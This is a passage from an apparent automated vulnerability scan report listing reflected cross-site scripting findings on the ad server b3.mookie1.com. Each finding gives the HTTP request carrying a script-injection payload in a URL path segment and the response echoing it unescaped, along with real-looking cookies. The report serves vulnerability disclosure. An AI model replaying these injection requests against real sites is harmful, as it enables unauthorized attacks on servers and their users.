P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/853761001/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.104. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284b4"><script>alert(1)</script>d510252fe66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/1348337210/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.105. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4d2"><script>alert(1)</script>1a64d0928f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/11959749775@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/901638741/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.106. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/11959749775@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764de"><script>alert(1)</script>9f3a5ed7d4b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90764de"><script>alert(1)</script>9f3a5ed7d4b HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:03:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/1687274362/x90764de"><script>alert(1)</script>9f3a5ed7d4b/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.107. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5f0"><script>alert(1)</script>f92225dbdf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/421997782/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.108. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff03f"><script>alert(1)</script>e08fcce560c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/81295705/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.109. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e9"><script>alert(1)</script>e3257083564 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/160846727/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.110. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e4"><script>alert(1)</script>518b442c3c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1034691805/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.111. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce9"><script>alert(1)</script>6f09d14ccb6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1849951236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 346
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1306728366/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.112. http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/247B3/Dominos/11Q2/CPC/728/1849951236@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a008"><script>alert(1)</script>f83aab5e457 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/247B3/Dominos/11Q2/CPC/728/1849951236@x901a008"><script>alert(1)</script>f83aab5e457 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 335
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/247B3/Dominos/11Q2/CPC/728/6479176/x901a008"><script>alert(1)</script>f83aab5e457/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

3.113. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9584"><script>alert(1)</script>e2a5ada99b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderc9584"><script>alert(1)</script>e2a5ada99b2/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/2013242908/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.114. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4c39"><script>alert(1)</script>30bb4a78677 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATTd4c39"><script>alert(1)</script>30bb4a78677/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1962202983/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.115. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613f7"><script>alert(1)</script>691cdb4b46f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired613f7"><script>alert(1)</script>691cdb4b46f/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1916158065/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.116. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13275"><script>alert(1)</script>f4b4f57d27c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; ATTW=TrafficMarketplaceB3; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-UVerseOpt13275"><script>alert(1)</script>f4b4f57d27c/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1/1957067333/x90/default/empty.gif/726348573830316230526341444e4645?x" target="_top">
...[SNIP]...

3.117. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-UVerseOpt/All/12cd8346d-f045-42c9-88fc-dcc60b1aceb1@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a923"><script>alert(1)</script>f5c014234ec was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

